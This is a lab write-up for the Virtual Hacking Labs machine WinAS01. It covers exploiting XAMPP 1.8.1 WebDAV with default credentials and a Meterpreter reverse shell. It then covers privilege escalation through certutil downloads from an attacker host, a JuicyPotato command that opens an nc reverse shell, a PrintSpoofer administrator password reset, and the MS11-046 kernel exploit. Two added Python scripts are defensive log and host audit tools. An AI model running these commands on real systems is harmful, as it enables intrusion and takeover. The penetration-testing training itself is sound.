
VHL — WinAS01

XAMPP 1.8.1 on Windows with Apache and SSL. Exploited outdated XAMPP configuration and weak credentials for web shell upload.

February 13, 2025 | Virtual Hacking Labs

#XAMPP #Apache #Web Shell #File Upload

nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-13 17:05 EST
Stats: 0:01:15 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 78.68% done; ETC: 17:06 (0:00:20 remaining)
Nmap scan report for 10.11.1.136
Host is up (0.019s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Apache httpd 2.4.3 ((Win32) OpenSSL/1.0.1c PHP/5.4.7)
|_http-server-header: Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7
| http-title: XAMPP 1.8.1
|_Requested resource was http://10.11.1.136/xampp/
443/tcp  open  ssl/http           Apache httpd 2.4.3 ((Win32) OpenSSL/1.0.1c PHP/5.4.7)
|_http-server-header: Apache/2.4.3 (Win32) OpenSSL/1.0.1c PHP/5.4.7
|_ssl-date: 2025-02-13T22:08:08+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
| http-title: XAMPP 1.8.1
|_Requested resource was https://10.11.1.136/xampp/
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=Winas01-PC
| Not valid before: 2025-02-12T21:11:16
|_Not valid after:  2025-08-14T21:11:16
|_ssl-date: 2025-02-13T22:08:08+00:00; 0s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: firewall|VoIP phone|VoIP adapter|broadband router|WAP
Running (JUST GUESSING): Fortinet embedded (97%), Polycom embedded (90%), Vonage embedded (90%), OneAccess embedded (87%), Orange embedded (87%), Sagem Communication embedded (87%)
OS CPE: cpe:/h:polycom:soundpoint_ip_331 cpe:/h:vonage:v-portal cpe:/h:oneaccess:1641 cpe:/h:orange:livebox cpe:/h:sagem:f%40ast_334 cpe:/h:sagem:f%40ast_3304
Aggressive OS guesses: Fortinet FortiGate-50B or 310B firewall (97%), Fortinet FortiGate 100D firewall (90%), Fortinet FortiGate 1500D firewall (90%), Fortinet FortiGate-60B or -100A firewall (90%), Polycom SoundPoint IP 331 VoIP phone (90%), Vonage V-Portal VoIP adapter (90%), OneAccess 1641 router (87%), Orange Livebox wireless DSL router or Sagem F@st 334 or 3304 DSL router (87%), Sagem F@st 3302 DSL router (87%)
No exact OS matches for host (test conditions non-ideal).

TRACEROUTE
HOP RTT      ADDRESS
1   18.91 ms 10.11.1.136

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 169.71 seconds
```

XAMPP WebDAV arbitrary file upload

  • Search for a XAMPP 1.8.1 WebDAV exploit
  • https://www.rapid7.com/db/modules/exploit/windows/http/xampp_webdav_upload_php/
```sh
msf6 exploit(windows/http/xampp_webdav_upload_php) > options

Module options (exploit/windows/http/xampp_webdav_upload_php):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The filename to give the payload. (Leave Blank for Random)
   PASSWORD  xampp            yes       The HTTP password to specify for authentication
   PATH      /webdav/         yes       The path to attempt to upload
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    10.11.1.136      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80               yes       The target port (TCP)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  wampp            yes       The HTTP username to specify for authentication
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.
```

```sh
msf6 exploit(windows/http/xampp_webdav_upload_php) > set rhosts 10.11.1.136
rhosts => 10.11.1.136
msf6 exploit(windows/http/xampp_webdav_upload_php) > set lhost 172.16.1.1
lhost => 172.16.1.1
msf6 exploit(windows/http/xampp_webdav_upload_php) > run

[*] Started reverse TCP handler on 172.16.1.1:4444 
[*] Uploading Payload to /webdav/GOz2E8h.php
[*] Attempting to execute Payload
[*] Sending stage (40004 bytes) to 10.11.1.136
[*] Meterpreter session 1 opened (172.16.1.1:4444 -> 10.11.1.136:49317) at 2025-02-13 19:48:24 -0500

meterpreter > getuid
Server username: Winas01
```

Metasploit failed

  • https://github.com/ruthvikvegunta/XAMPP-WebDAV-Exploit
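The upload chain above (an authenticated WebDAV PUT of a PHP file into `/webdav/`, then a GET to execute it) leaves a distinctive trace in Apache's access log. The following Python script is an added example, not part of the original writeup, the Metasploit module or the linked GitHub exploit: it scans combined-format access log lines for 2xx responses to PUT requests that write server-executable extensions, raises the severity when the request was authenticated as XAMPP's shipped `wampp` WebDAV account (the USERNAME in the module options), and reports later requests that execute the uploaded path. The log lines are constructed for the example; the client address and timestamps are not from the engagement.

```python
import re

# Apache "combined" log format; the third field (%u) is the HTTP Basic-auth user.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Extensions Apache/PHP will execute once the file sits under the document root.
# The trailing (\.|$) also catches double extensions such as shell.php.txt.
EXEC_EXT = re.compile(r'\.(php\d?|phtml|phar)(\.|$)', re.IGNORECASE)

# The WebDAV account XAMPP 1.8.x shipped with (USERNAME in the module options above).
DEFAULT_DAV_USER = "wampp"

# Constructed sample, modelled on the upload seen above (/webdav/GOz2E8h.php);
# the client address and timestamps are invented for this example.
SAMPLE_LOG = """\
10.11.1.50 - - [13/Feb/2025:19:40:02 -0500] "GET /xampp/ HTTP/1.1" 200 7401 "-" "Mozilla/5.0"
10.11.1.50 - - [13/Feb/2025:19:48:23 -0500] "PUT /webdav/GOz2E8h.php HTTP/1.1" 401 381 "-" "-"
10.11.1.50 - wampp [13/Feb/2025:19:48:24 -0500] "PUT /webdav/GOz2E8h.php HTTP/1.1" 201 0 "-" "-"
10.11.1.50 - - [13/Feb/2025:19:48:25 -0500] "GET /webdav/GOz2E8h.php HTTP/1.1" 200 0 "-" "-"
10.11.1.50 - wampp [13/Feb/2025:19:50:00 -0500] "PUT /webdav/notes.txt HTTP/1.1" 201 0 "-" "-"
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_webdav_upload(lines):
    """Scan log lines in order; return alerts for executable files written via
    WebDAV PUT and for later requests that execute them."""
    alerts = []
    written = set()  # paths of executable files the server accepted
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        status = int(rec["status"])
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "PUT" and 200 <= status < 300 and EXEC_EXT.search(path):
            reason = "executable file written via WebDAV PUT"
            severity = "high"
            if rec["user"] == DEFAULT_DAV_USER:
                reason += "; authenticated as the XAMPP default WebDAV user"
                severity = "critical"
            written.add(path)
            alerts.append({"severity": severity, "ip": rec["ip"], "user": rec["user"],
                           "ts": rec["ts"], "path": path, "reason": reason})
        elif path in written and rec["method"] in ("GET", "POST") and status == 200:
            alerts.append({"severity": "critical", "ip": rec["ip"], "user": rec["user"],
                           "ts": rec["ts"], "path": path,
                           "reason": "previously uploaded file executed"})
    return alerts


if __name__ == "__main__":
    for a in detect_webdav_upload(SAMPLE_LOG.splitlines()):
        print(f"[{a['severity']}] {a['ts']} {a['ip']} {a['path']}: {a['reason']}")
```

The rejected 401 followed by a 201 from the same client a second later is itself a default-credential indicator worth alerting on. MOVE and COPY also create files, but their target travels in the `Destination` request header, which the default LogFormat does not record; add `%{Destination}i` to the format if renamed uploads are a concern. The log check is a compensating control only: the fix on a host like this one is to disable the WebDAV location or replace the shipped credentials.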

priv esc

```sh
C:\xampp\webdav>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
```

SeImpersonatePrivilege

```cmd
C:\xampp\webdav>systeminfo
systeminfo

Host Name:                 WINAS01-PC
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Winas01
Registered Organization:   
Product ID:                55041-035-7319877-86893
Original Install Date:     11/5/2016, 6:56:40 PM
System Boot Time:          2/13/2025, 1:11:01 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2194 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     1,023 MB
Available Physical Memory: 698 MB
Virtual Memory: Max Size:  2,047 MB
Virtual Memory: Available: 1,211 MB
Virtual Memory: In Use:    836 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\WINAS01-PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2884256
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.11.1.136
                                 [02]: fe80::7090:53f5:6a53:2531
```
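Two outputs above decide how far the foothold goes: `whoami /priv` shows the account serving web content holding SeImpersonatePrivilege, and `systeminfo` shows a Windows 7 SP1 host with two hotfixes installed. The following Python host-audit script is an added example (not from the writeup or any of the tools it downloads) that parses both outputs and reports what a defender would remediate: token-impersonation and other high-impact privileges held by a service account, the unsupported OS version, and the installed hotfix list. The sample inputs are copied from the output above (the systeminfo text trimmed to the lines the parser reads); the set of privileges treated as high-impact is my own selection.

```python
import re

# Privileges that let a compromised service account escalate. The selection is
# this example's own; the text says what each one allows.
HIGH_IMPACT_PRIVS = {
    "SeImpersonatePrivilege": "impersonate other users' tokens (Potato-class escalation)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Copied from the whoami /priv output above.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

# Copied from the systeminfo output above, trimmed to the lines parsed here.
SYSTEMINFO = """\
Host Name:                 WINAS01-PC
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Configuration:          Standalone Workstation
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2884256
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# The description column can fill its width, leaving a single space before
# the State column, so split on the trailing Enabled/Disabled token instead
# of on runs of whitespace.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")
FIELD_LINE = re.compile(r"^(Host Name|OS Name|OS Version):\s+(.*?)\s*$")
HOTFIX_LINE = re.compile(r"^\s+\[\d+\]:\s+(KB\d+)\s*$")


def parse_whoami_priv(text):
    """Map each privilege held by the token to its State column."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line)
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def parse_systeminfo(text):
    """Pull host name, OS name/version and installed hotfixes from systeminfo."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        m = FIELD_LINE.match(line)
        if m:
            info[m.group(1)] = m.group(2)
            continue
        m = HOTFIX_LINE.match(line)
        if m:
            info["hotfixes"].append(m.group(1))
    return info


def audit(whoami_text, systeminfo_text):
    """Return the findings a defender would act on for this account and host."""
    privs = parse_whoami_priv(whoami_text)
    info = parse_systeminfo(systeminfo_text)
    findings = []
    # The State column only says whether the privilege is currently enabled in
    # the token; a process holding a disabled privilege can enable it itself,
    # so presence is what matters, and the state is reported for context.
    for name, state in privs.items():
        if name in HIGH_IMPACT_PRIVS:
            findings.append(f"{name} held ({state}): {HIGH_IMPACT_PRIVS[name]}")
    version = info.get("OS Version", "")
    if version.startswith("6.1."):
        findings.append("6.1 kernel (Windows 7 / Server 2008 R2): out of support since January 2020")
    hotfixes = info["hotfixes"]
    findings.append(f"{len(hotfixes)} hotfix(es) installed: {', '.join(hotfixes) or 'none'}")
    return {"host": info.get("Host Name"), "os": info.get("OS Name"),
            "version": version, "findings": findings}


if __name__ == "__main__":
    report = audit(WHOAMI_PRIV, SYSTEMINFO)
    print(f"{report['host']}: {report['os']} {report['version']}")
    for f in report["findings"]:
        print(" -", f)
```

Run against this box, the report names SeImpersonatePrivilege on the web server's account, which is the precondition for every Potato variant and for PrintSpoofer tried below; the remediation is to run the web server under an account without that privilege, on a supported OS that actually receives kernel patches.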
```sh
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/JuicyPotatox86.exe JuicyPotatox86.exe
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/nc.exe nc.exe
```

```cmd
c:\xampp\webdav\JuicyPotatox86.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\xampp\webdav\nc.exe 172.16.1.1 443 -e cmd.exe" -t *
```

```sh
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/PrintSpoofer32.exe PrintSpoofer32.exe
```

```cmd
.\PrintSpoofer32.exe -c "net user administrator Welcome1" output
```

```cmd
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/GodPotato-NET2.exe GodPotato-NET2.exe
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/GodPotato-NET35.exe GodPotato-NET35.exe
```

```cmd
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/winPEASx86.exe winPEASx86.exe
```
```cmd
Host Name:                 WINAS01-PC
OS Name:                   Microsoft Windows 7 Professional 
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Winas01
Registered Organization:   
Product ID:                55041-035-7319877-86893
Original Install Date:     11/5/2016, 6:56:40 PM
System Boot Time:          2/13/2025, 1:11:01 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 6 Model 85 Stepping 7 GenuineIntel ~2194 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     1,023 MB
Available Physical Memory: 647 MB
Virtual Memory: Max Size:  2,047 MB
Virtual Memory: Available: 1,174 MB
Virtual Memory: In Use:    873 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\WINAS01-PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2884256
                           [02]: KB976902
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.11.1.136
                                 [02]: fe80::7090:53f5:6a53:2531
```
```sh
sudo python2.7 windows-exploit-suggester.py --update
```

```cmd
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/bfill.exe bfill.exe
```

```cmd
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/MS14-40-x86.exe MS14-40-x86.exe
```

```cmd
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/42432.exe 42432.exe
```

kernel MS11-046

  • https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046
```cmd
C:\xampp\webdav>certutil.exe -f -urlcache -split http://172.16.1.1/ms11-046.exe ms11-046.exe
certutil.exe -f -urlcache -split http://172.16.1.1/ms11-046.exe ms11-046.exe
****  Online  ****
  000000  ...
  01b8af
CertUtil: -URLCache command completed successfully.

C:\xampp\webdav>.\ms11-046.exe
.\ms11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>type C:\users\administrator\desktop\key.txt
type C:\users\administrator\desktop\key.txt
25cx2lbsi97ofbcosbyp
c:\Windows\System32>date
date
The current date is: Thu 02/13/2025 
Enter the new date: (mm-dd-yy)
```